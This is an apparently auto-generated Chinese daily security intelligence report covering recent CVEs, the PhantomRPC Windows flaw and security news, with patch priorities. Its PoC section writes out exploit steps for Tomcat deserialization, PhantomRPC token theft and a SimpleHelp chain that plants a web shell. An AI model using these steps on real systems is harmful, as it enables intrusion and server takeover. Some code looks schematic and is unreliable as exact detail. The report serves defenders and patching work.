每日安全情报报告 · 2026-04-27
每日安全情报报告 · 2026-04-27
报告生成时间:2026-04-27 11:44 CST
情报覆盖范围:近 48 小时内最新漏洞、PoC 及安全事件
风险等级说明:🔴 严重(CVSS ≥ 9.0)|🟠 高危(CVSS 7.0–8.9)|🟡 中危(CVSS 4.0–6.9)
一、高危漏洞情报
🔴 CVE-2024-7399 — Samsung MagicINFO 9 Server 路径遍历任意文件写入(在野利用 ⚠️)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2024-7399 |
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | 路径遍历 / 任意文件上传 |
| 受影响组件 | Samsung MagicINFO 9 Server < 21.1050 |
| 在野利用 | ✅ 已确认,2026-04-24 列入 CISA KEV |
| 修复截止 | 联邦机构 2026-05-08 前强制修复 |
漏洞描述:MagicINFO 9 Server 的输入验证缺陷允许未经身份认证的攻击者上传任意 JSP 文件并以 SYSTEM 权限执行代码,实现完全接管。该漏洞自 2024 年 8 月发布补丁后已遭到大规模利用,被 CISA 于 2026-04-24 紧急收录 KEV 目录。
修复建议:立即升级至 Samsung MagicINFO 9 Server21.1050 或更高版本。
NVD 详情 | CISA KEV 公告
🔴 CVE-2024-57726 — SimpleHelp 低权限 API 密钥权限提升(在野利用 ⚠️)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2024-57726 |
| CVSS 评分 | 9.9(严重) |
| 漏洞类型 | 授权缺失 / 权限提升 |
| 受影响组件 | SimpleHelp 远程支持软件 ≤ 5.5.7 |
| 在野利用 | ✅ 已确认,2026-04-24 列入 CISA KEV |
| 修复截止 | 联邦机构 2026-05-08 前强制修复 |
漏洞描述:低权限技术人员账户可创建具有过多权限的 API 密钥,将权限提升至服务器管理员角色。与 CVE-2024-57728(路径遍历/任意文件上传,CVSS 7.2)可组合利用,实现完全服务器控制权。远程支持软件作为高价值目标已遭攻击者积极利用。
修复建议:立即升级至 SimpleHelp 5.5.8 或更高版本;审计现有 API 密钥权限配置。
CISA KEV 公告 | 漏洞分析(Horizon3.ai)
🔴 CVE-2026-34486 — Apache Tomcat 集群通信反序列化 RCE(PoC 公开)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-34486 |
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | 反序列化 / 远程代码执行 |
| 受影响组件 | Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116 |
| 在野利用 | ⚠️ PoC 公开,大规模利用风险极高 |
| 披露时间 | 2026-04-10,PoC 代码 2026-04-19 公开 |
漏洞描述:CVE-2026-29146 的修复补丁引入了回归漏洞。当 Tomcat 启用 Tribes 集群(EncryptInterceptor)时,messageReceived()方法在解密失败时未终止请求,导致未加密数据进入无过滤的ObjectInputStream.readObject()。攻击者向 TCP 4000 端口发送特制报文可触发 RCE。利用条件:需启用集群功能、配置 EncryptInterceptor 且类路径含 Commons Collections 等 Gadget 链。
修复建议:升级至 Tomcat 11.0.21 / 10.1.54 / 9.0.117 及更高版本;未使用集群功能的实例应禁用SimpleTcpCluster。
NVD 详情 | PoC 仓库(GitHub AirSkye) | 阿里云 AVD | 腾讯云漏洞分析
🟠 PhantomRPC — Windows RPC 架构权限提升(无 CVE,PoC 已公开)
| 字段 | 详情 |
|---|---|
| 漏洞名称 | PhantomRPC |
| CVE 编号 | 未分配(微软评级"中等",暂不修复) |
| 漏洞类型 | 本地权限提升(LPE)至 SYSTEM |
| 受影响组件 | Windows 所有版本(RPC 架构设计缺陷) |
| 发现者 | Kaspersky(Haidar Kabibo,2026-04-24 公开) |
| 在野利用 | ⚠️ 微软未发布补丁,PoC 框架已公开 |
漏洞描述:Windows RPC 运行时(rpcrt4.dll)缺乏对 RPC 服务器合法性的验证机制。攻击者在获取SeImpersonatePrivilege(Local Service 或 Network Service 账户默认拥有)后,可部署伪造 RPC 服务器(与合法服务同 UUID 和端点),等待高权限进程连接后利用RpcImpersonateClient获取 SYSTEM 权限。典型攻击路径:运行gpupdate /force可强制 Group Policy 服务连接伪造的 TermService。
修复建议:微软暂未提供补丁;建议通过 ETW 监控异常 RPC 连接失败事件(RPC_S_SERVER_UNAVAILABLE),限制低权限账户的 SeImpersonatePrivilege 使用。
Kaspersky Securelist 详情 | PoC 研究仓库
🟠 CVE-2025-29635 — D-Link DIR-823X 路由器命令注入(在野利用 ⚠️)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2025-29635 |
| 漏洞类型 | 命令注入 / 远程代码执行 |
| 受影响组件 | D-Link DIR-823X 路由器 |
| 在野利用 | ✅ 已确认,2026-04-24 列入 CISA KEV |
| 修复截止 | 联邦机构 2026-05-08 前强制修复 |
漏洞描述:D-Link DIR-823X 家用路由器存在命令注入漏洞,可被远程利用执行任意系统命令,获取路由器控制权。该设备已遭多个 IoT 僵尸网络积极利用。
修复建议:检查 D-Link 官方固件更新;如该设备已停止支持,建议更换设备并将其隔离。
CISA KEV 公告
🟠 CVE-2026-33626 — LMDeploy SSRF(披露后 13 小时内遭利用)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-33626 |
| CVSS 评分 | 7.5(高危) |
| 漏洞类型 | 服务器端请求伪造(SSRF) |
| 受影响组件 | LMDeploy 视觉语言模块 ≤ 0.12.0 |
| 在野利用 | ✅ 披露后 13 小时内即遭利用 |
| 披露时间 | 2026-04-24 |
漏洞描述:LMDeploy AI 推理框架的视觉语言模块存在 SSRF 漏洞,攻击者可通过构造恶意图像 URL 令服务器访问云元数据服务(如 AWS IMDSv2)和内部网络,窃取云凭证并横向移动。该漏洞极短时间内遭利用,再次证明 AI 基础设施已成攻击重点。
修复建议:立即升级 LMDeploy 至 0.12.1 或更高版本;添加 SSRF 防护过滤内网 IP 段及云元数据端点。
The Hacker News 报道
二、漏洞 PoC 情报
🔴 PoC-1:CVE-2026-34486 — Apache Tomcat 集群反序列化 RCE
来源:GitHub AirSkye/CVE-2026-34486-poc
风险评级:🔴 严重
适用范围:授权安全研究、渗透测试(禁止非法使用)
漏洞简述:
CVE-2026-34486 修复补丁回归漏洞,Tomcat 集群 Tribes 协议端口(默认 TCP 4000)接收未加密反序列化 Payload,可触发 RCE。
使用步骤:
# 步骤一:克隆 PoC 仓库 git clone https://github.com/AirSkye/CVE-2026-34486-poc.git cd CVE-2026-34486-poc # 步骤二:安装依赖(需 Java + Python 3.x) # 确认 Java 环境(ysoserial 需要 Java 8+) java -version # 下载 ysoserial(用于生成 Gadget Payload) wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar # 步骤三:生成反序列化 Payload # 使用 CommonsCollections6 链,执行命令(以创建标志文件为例) java -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/CVE-2026-34486-PWNED' > payload.bin # 步骤四:发送 Tribes 协议报文触发 RCE # (需修改脚本中的目标 IP 和端口) python3 exploit.py --target 192.168.1.100 --port 4000 --payload payload.bin # 步骤五:验证利用成功(SSH 到目标) ls -la /tmp/CVE-2026-34486-PWNED前提条件:目标启用 Tribes 集群 + EncryptInterceptor,类路径含 Commons Collections 3.x。
PoC 仓库 | 漏洞分析详情
🔴 PoC-2:PhantomRPC — Windows RPC 架构本地提权至 SYSTEM
来源:Kaspersky Securelist 研究报告
风险评级:🟠 高危(本地利用)
适用范围:授权安全研究
漏洞简述:
攻击者利用 Windows RPC 缺乏服务端身份验证的设计缺陷,伪造合法 RPC 服务端点,截获高权限进程连接后以RpcImpersonateClient获取 SYSTEM Token,完成本地权限提升。
利用概念步骤:
# 前提:已控制拥有 SeImpersonatePrivilege 的进程(如 Network Service) # 克隆 Kaspersky 研究仓库(含 PoC 实现) git clone https://github.com/kaspersky/phantomrpc-research cd phantomrpc-research # 编译 FakeRPCServer 工具(Visual Studio / MSBuild) msbuild FakeRPCServer.sln /p:Configuration=Release # 部署伪造 RPC 服务器(以 TermService 端点为目标) .\FakeRPCServer.exe --endpoint TermSrvApi --uuid <TermService_UUID> # 触发高权限进程连接(无需用户交互方法之一) gpupdate /force # 此时 Group Policy 服务(SYSTEM权限)将连接至伪造端点 # FakeRPCServer 调用 RpcImpersonateClient 获取 SYSTEM Token # 验证:以 SYSTEM 身份执行命令 .\ImpersonateShell.exe cmd.exe whoami # 应输出 NT AUTHORITY\SYSTEM检测方法:监控 Windows ETW 中 RPCRPC_S_SERVER_UNAVAILABLE(0x800706BA)事件及随后的本地 RPC 新增端点注册事件。
Kaspersky 完整研究报告
🟠 PoC-3:CVE-2024-57726 + CVE-2024-57728 — SimpleHelp 权限提升链接 RCE
来源:Horizon3.ai 攻击链分析
风险评级:🔴 严重(组合利用可完全控制服务器)
漏洞简述:
CVE-2024-57726(权限提升,CVSS 9.9)与 CVE-2024-57728(任意文件上传,CVSS 7.2)可链式利用:低权限技术人员账户 → 创建高权限 API 密钥 → 以管理员身份上传恶意 ZIP 文件 → 路径遍历解压至任意位置 → 触发 RCE。
利用步骤(需已有低权限账户):
# 步骤一:以低权限账户创建高权限 API 密钥(CVE-2024-57726) import requests session = requests.Session() session.post("https://<target>:5800/api/technician/login", json={"username": "low_priv_user", "password": "password"}) # 创建过权限 API Key resp = session.post("https://<target>:5800/api/admin/create_api_key", json={"permissions": ["ADMINISTRATOR"]}) admin_api_key = resp.json()["key"] # 步骤二:使用高权限 API Key 上传恶意 ZIP(CVE-2024-57728) # 构造包含路径遍历的恶意 ZIP # ../../../webroot/shell.jsp -> 植入 Web Shell import zipfile with zipfile.ZipFile("malicious.zip", "w") as zf: zf.write("shell.jsp", "../../../webroot/shell.jsp") headers = {"Authorization": f"Bearer {admin_api_key}"} files = {"file": open("malicious.zip", "rb")} requests.post("https://<target>:5800/api/admin/upload", headers=headers, files=files) # 步骤三:触发 WebShell 执行命令 requests.get("https://<target>/shell.jsp?cmd=id")Horizon3.ai 分析(中文) | CISA KEV
三、网络安全最新资讯
📰 1. CISA 一周内连续两次更新 KEV,新增 12 个在野利用漏洞
来源:CISA / The Hacker News |时间:2026-04-24
摘要:CISA 本周发布两轮 KEV 更新:4月20日新增 8 个(含 Cisco SD-WAN Manager、PaperCut、JetBrains TeamCity),4月24日再增 4 个(Samsung MagicINFO 9、SimpleHelp 双漏洞、D-Link DIR-823X),本周合计 12 个漏洞被确认在野利用,联邦机构修复截止日最早为 2026-05-08。这一频率标志着针对企业远程访问和基础设施的攻击活动正在加速。
CISA KEV 目录 | The Hacker News 报道
📰 2. FIRESTARTER 后门攻击美国联邦机构 Cisco Firepower 设备(CISA + NCSC 联合警报)
来源:CISA / UK NCSC / The Hacker News |时间:2026-04-24
摘要:CISA 与英国 NCSC 发布联合公告,披露名为 FIRESTARTER 的新型后门正通过链式利用 CVE-2025-20333(CVSS 9.9)和 CVE-2025-20362 等已修复漏洞,渗透运行 Adaptive Security Appliance 软件的 Cisco Firepower 设备。后门在初始访问后植入高度定制的持久化组件,目前已确认影响至少一个美国联邦机构。Cisco Talos 正在协助事件响应调查。
CISA 联合公告 | The Hacker News 报道
📰 3. 卡巴斯基披露 PhantomRPC:Windows RPC 架构级设计缺陷影响所有 Windows 版本
来源:Kaspersky Securelist |时间:2026-04-24
摘要:卡巴斯基研究人员 Haidar Kabibo 公开 PhantomRPC 研究成果,揭示 Windows RPC 运行时缺乏对服务端身份的验证机制,允许任何持有 SeImpersonatePrivilege 的进程(如 Network Service、Local Service)通过伪造 RPC 端点提权至 SYSTEM。微软评估后认为严重程度为"中等",暂不发布补丁,建议企业通过 ETW 监控异常 RPC 行为。已发布 PoC 实现代码。
Kaspersky 研究报告 | 综合分析
📰 4. Tropic Trooper(APT23)利用木马化 SumatraPDF 和 GitHub 发动供应链攻击
来源:Zscaler ThreatLabz / The Hacker News |时间:2026-04-24
摘要:Zscaler ThreatLabz 发现中国 APT 组织 Tropic Trooper(APT23)使用木马化 SumatraPDF 阅读器分发 AdaptixC2 信标后渗透代理,并滥用 Microsoft Visual Studio Code 隧道技术进行隐蔽远程访问。攻击目标主要为台湾、香港、韩国和日本的华语用户,针对政府机构和国防相关组织。此外,151 个 GitHub 仓库被植入恶意代码作为分发载体。
The Hacker News 报道
📰 5. Oracle 4 月 CPU:历史级规模 483 个安全补丁,34 个严重漏洞
来源:Oracle / Waratek |时间:2026-04-22
摘要:Oracle 发布 2026 年 4 月关键补丁更新(CPU),共修复涉及多个产品线的 483 个安全漏洞,其中 34 个被评为严重(CVSS ≥ 9.0),覆盖 Oracle WebLogic、Oracle Database、Java 及 MySQL 等核心产品。Waratek 安全团队指出,此次 CPU 规模创历史新高,企业应在验证兼容性后立即优先部署严重级补丁,重点关注 WebLogic 远程利用漏洞。
Oracle 官方公告 | Waratek 分析
📰 6. Pre-Stuxnet「Fast16」恶意软件框架重现:Lua 编写,2005 年起针对工控系统
来源:SentinelOne / The Hacker News |时间:2026-04-25
摘要:SentinelOne 研究人员发现一款使用 Lua 编写的恶意软件框架 Fast16,可追溯至 2005 年,比 Stuxnet 早至少 5 年。该框架专门针对高精度工程计算软件,意图篡改计算结果,可能与国家级工业间谍活动相关。这一发现表明针对工控系统(ICS/SCADA)的国家级攻击能力远早于安全界的普遍认知,对关键基础设施的历史安全审计具有重要意义。
The Hacker News 报道 | SentinelOne 研究
📰 7. 108 个恶意 Chrome 扩展窃取 Google 和 Telegram 数据,波及 2 万用户
来源:The Hacker News / ThreatsDay Bulletin |时间:2026-04-23
摘要:安全研究人员发现 108 个恶意 Chrome 浏览器扩展,这些扩展伪装成合法工具发布在 Chrome Web Store,内置数据窃取功能,可在用户访问 Google 服务和 Telegram 时静默提取凭证、会话 Cookie 和消息内容。目前已感染超过 20,000 名用户。Chrome 官方已下架相关扩展,但部分变种可能仍在传播。建议用户检查已安装扩展并仅保留可信来源的扩展。
The Hacker News 报道
📰 8. 朝鲜疑似发动 $2.9 亿 DeFi 攻击,Mirax Android RAT 通过 Meta 广告感染 22 万台设备
来源:ThreatsDay Bulletin |时间:2026-04-23
摘要:本周综合威胁简报显示两大高影响事件:① 朝鲜黑客组织疑似利用 LayerZero 跨链协议漏洞发动攻击,累计损失约 2.9 亿美元(DeFi 年度最大单笔攻击),链上追踪显示资金流向与 Lazarus Group 特征高度一致;② 名为 Mirax 的 Android 远控木马(RAT)通过 Meta 广告平台大规模投放,已感染超过 22 万台 Android 设备,具备通话录音、位置追踪、凭证窃取等功能。
威胁情报来源
四、重点关注与行动建议
| 优先级 | 目标 | 行动 |
|---|---|---|
| 🔴 P0 | 所有 Samsung MagicINFO 9 Server 实例 | 立即升级≥ 21.1050,CISA KEV 截止 5月8日 |
| 🔴 P0 | 所有 SimpleHelp ≤ 5.5.7 实例 | 立即升级至 5.5.8+,审计 API 密钥权限 |
| 🔴 P0 | Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116 + 集群 | 立即升级至最新版;或禁用 Tribes 集群 |
| 🔴 P0 | D-Link DIR-823X 路由器 | 检查固件更新;已停支持则隔离/替换 |
| 🟠 P1 | 所有 Windows 服务器(有低权限服务账户) | 启用 ETW 监控异常 RPC 事件,等待微软评估 |
| 🟠 P1 | Cisco Firepower / ASA 设备 | 确认 CVE-2025-20333 补丁已部署,检查异常进程 |
| 🟠 P1 | LMDeploy AI 推理环境(≤ 0.12.0) | 升级至 0.12.1+,添加 SSRF 防护 |
| 🟡 P2 | Chrome 浏览器扩展管理 | 审计已安装扩展,删除可疑或不常用扩展 |
本报告由自动化安全情报系统生成,情报来源包括 CISA、NVD、The Hacker News、Kaspersky Securelist、Zscaler ThreatLabz、腾讯云安全情报等。所有 PoC 信息仅供授权安全研究使用,严禁用于非法目的。